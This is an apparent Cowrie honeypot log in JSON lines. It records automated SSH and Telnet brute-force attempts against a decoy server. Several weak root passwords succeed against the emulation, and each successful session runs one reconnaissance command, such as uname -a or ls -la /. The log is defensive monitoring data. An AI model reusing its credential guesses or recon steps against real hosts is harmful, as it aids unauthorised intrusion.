{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:53:09.362349Z","src_ip":"79.127.48.196","session":"595f91353807"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49536,"dst_ip":"1.2.3.4","dst_port":22,"session":"82aebc3b8156","protocol":"ssh","message":"New connection: 212.227.125.160:49536 (1.2.3.4:22) [session: 82aebc3b8156]","sensor":"my-vps","timestamp":"2025-08-28T20:53:11.694755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:53:12.615087Z","src_ip":"212.227.125.160","session":"82aebc3b8156"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:53:12.616603Z","src_ip":"212.227.125.160","session":"82aebc3b8156"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35439,"dst_ip":"1.2.3.4","dst_port":23,"session":"668c0971473b","protocol":"telnet","message":"New connection: 212.227.125.160:35439 (1.2.3.4:23) [session: 668c0971473b]","sensor":"my-vps","timestamp":"2025-08-28T20:53:14.462970Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:53:18.797472Z","src_ip":"212.227.125.160","session":"82aebc3b8156"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:53:20.825485Z","src_ip":"212.227.125.160","session":"82aebc3b8156"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-28T20:53:20.826361Z","src_ip":"212.227.125.160","session":"82aebc3b8156"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:53:21.807435Z","src_ip":"212.227.125.160","session":"82aebc3b8156"}
{"eventid":"cowrie.session.closed","duration":"10.1","message":"Connection lost after 10.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:53:21.808650Z","src_ip":"212.227.125.160","session":"82aebc3b8156"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":32886,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a82532b914e","protocol":"ssh","message":"New connection: 201.148.180.50:32886 (1.2.3.4:22) [session: 8a82532b914e]","sensor":"my-vps","timestamp":"2025-08-28T20:53:29.797702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:53:30.887998Z","src_ip":"201.148.180.50","session":"8a82532b914e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:53:30.888815Z","src_ip":"201.148.180.50","session":"8a82532b914e"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:53:36.233467Z","src_ip":"201.148.180.50","session":"8a82532b914e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:53:38.709835Z","src_ip":"201.148.180.50","session":"8a82532b914e"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T20:53:38.710563Z","src_ip":"201.148.180.50","session":"8a82532b914e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:53:40.103052Z","src_ip":"201.148.180.50","session":"8a82532b914e"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:53:40.104373Z","src_ip":"201.148.180.50","session":"8a82532b914e"}
{"eventid":"cowrie.session.closed","duration":31.438650131225586,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:53:45.901553Z","src_ip":"212.227.125.160","session":"668c0971473b"}
{"eventid":"cowrie.login.success","username":"root","password":"123000","message":"login attempt [root/123000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:53:51.248145Z","src_ip":"79.127.48.196","session":"595f91353807"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:54:17.037032Z","src_ip":"79.127.48.196","session":"595f91353807"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-28T20:54:17.037743Z","src_ip":"79.127.48.196","session":"595f91353807"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"11.6","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 11.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:54:28.631337Z","src_ip":"79.127.48.196","session":"595f91353807"}
{"eventid":"cowrie.session.closed","duration":"102.6","message":"Connection lost after 102.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:54:44.145403Z","src_ip":"79.127.48.196","session":"595f91353807"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":10048,"dst_ip":"1.2.3.4","dst_port":22,"session":"00ce1330b12e","protocol":"ssh","message":"New connection: 186.225.142.90:10048 (1.2.3.4:22) [session: 00ce1330b12e]","sensor":"my-vps","timestamp":"2025-08-28T20:55:12.392722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:55:12.393635Z","src_ip":"186.225.142.90","session":"00ce1330b12e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:55:12.585358Z","src_ip":"186.225.142.90","session":"00ce1330b12e"}
{"eventid":"cowrie.login.success","username":"root","password":"104120","message":"login attempt [root/104120] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:55:13.163345Z","src_ip":"186.225.142.90","session":"00ce1330b12e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:55:14.009285Z","src_ip":"186.225.142.90","session":"00ce1330b12e"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T20:55:14.009963Z","src_ip":"186.225.142.90","session":"00ce1330b12e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:55:14.202651Z","src_ip":"186.225.142.90","session":"00ce1330b12e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:55:14.203771Z","src_ip":"186.225.142.90","session":"00ce1330b12e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64818,"dst_ip":"1.2.3.4","dst_port":22,"session":"988bb6a4116a","protocol":"ssh","message":"New connection: 217.72.205.35:64818 (1.2.3.4:22) [session: 988bb6a4116a]","sensor":"my-vps","timestamp":"2025-08-28T20:55:43.386142Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:55:43.387615Z","src_ip":"217.72.205.35","session":"988bb6a4116a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62844,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcf0fb8c6856","protocol":"ssh","message":"New connection: 212.227.125.160:62844 (1.2.3.4:22) [session: fcf0fb8c6856]","sensor":"my-vps","timestamp":"2025-08-28T20:56:46.537562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T20:56:46.552496Z","src_ip":"212.227.125.160","session":"fcf0fb8c6856"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T20:56:46.636381Z","src_ip":"212.227.125.160","session":"fcf0fb8c6856"}
{"eventid":"cowrie.login.failed","username":"jayden","password":"jayden","message":"login attempt [jayden/jayden] failed","sensor":"my-vps","timestamp":"2025-08-28T20:56:47.015054Z","src_ip":"212.227.125.160","session":"fcf0fb8c6856"}
{"eventid":"cowrie.login.failed","username":"jayden","password":"jayden1","message":"login attempt [jayden/jayden1] failed","sensor":"my-vps","timestamp":"2025-08-28T20:56:48.101855Z","src_ip":"212.227.125.160","session":"fcf0fb8c6856"}
{"eventid":"cowrie.login.failed","username":"jayden","password":"jayden123","message":"login attempt [jayden/jayden123] failed","sensor":"my-vps","timestamp":"2025-08-28T20:56:49.189155Z","src_ip":"212.227.125.160","session":"fcf0fb8c6856"}
{"eventid":"cowrie.login.failed","username":"jayden","password":"jayden1234","message":"login attempt [jayden/jayden1234] failed","sensor":"my-vps","timestamp":"2025-08-28T20:56:50.275822Z","src_ip":"212.227.125.160","session":"fcf0fb8c6856"}
{"eventid":"cowrie.login.failed","username":"jayden","password":"jayden12345","message":"login attempt [jayden/jayden12345] failed","sensor":"my-vps","timestamp":"2025-08-28T20:56:51.362188Z","src_ip":"212.227.125.160","session":"fcf0fb8c6856"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:56:52.449533Z","src_ip":"212.227.125.160","session":"fcf0fb8c6856"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55770,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba0ae7934ed5","protocol":"ssh","message":"New connection: 212.227.125.160:55770 (1.2.3.4:22) [session: ba0ae7934ed5]","sensor":"my-vps","timestamp":"2025-08-28T20:59:30.212091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:59:31.729101Z","src_ip":"212.227.125.160","session":"ba0ae7934ed5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:59:31.729869Z","src_ip":"212.227.125.160","session":"ba0ae7934ed5"}
{"eventid":"cowrie.login.success","username":"root","password":"Suporte","message":"login attempt [root/Suporte] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:59:37.721552Z","src_ip":"212.227.125.160","session":"ba0ae7934ed5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:59:40.681158Z","src_ip":"212.227.125.160","session":"ba0ae7934ed5"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-28T20:59:40.682050Z","src_ip":"212.227.125.160","session":"ba0ae7934ed5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:59:42.113446Z","src_ip":"212.227.125.160","session":"ba0ae7934ed5"}
{"eventid":"cowrie.session.closed","duration":"11.9","message":"Connection lost after 11.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:59:42.114719Z","src_ip":"212.227.125.160","session":"ba0ae7934ed5"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":35960,"dst_ip":"1.2.3.4","dst_port":22,"session":"22ba49cc6979","protocol":"ssh","message":"New connection: 201.148.180.50:35960 (1.2.3.4:22) [session: 22ba49cc6979]","sensor":"my-vps","timestamp":"2025-08-28T20:59:51.379096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:59:52.520641Z","src_ip":"201.148.180.50","session":"22ba49cc6979"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:59:52.521403Z","src_ip":"201.148.180.50","session":"22ba49cc6979"}
{"eventid":"cowrie.login.success","username":"root","password":"Suporte","message":"login attempt [root/Suporte] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:59:58.510427Z","src_ip":"201.148.180.50","session":"22ba49cc6979"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:00:01.064213Z","src_ip":"201.148.180.50","session":"22ba49cc6979"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-28T21:00:01.064962Z","src_ip":"201.148.180.50","session":"22ba49cc6979"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:00:02.508164Z","src_ip":"201.148.180.50","session":"22ba49cc6979"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:00:02.511024Z","src_ip":"201.148.180.50","session":"22ba49cc6979"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":28592,"dst_ip":"1.2.3.4","dst_port":22,"session":"415b628f4b1a","protocol":"ssh","message":"New connection: 212.227.235.229:28592 (1.2.3.4:22) [session: 415b628f4b1a]","sensor":"my-vps","timestamp":"2025-08-28T21:01:22.518928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T21:01:22.520119Z","src_ip":"212.227.235.229","session":"415b628f4b1a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1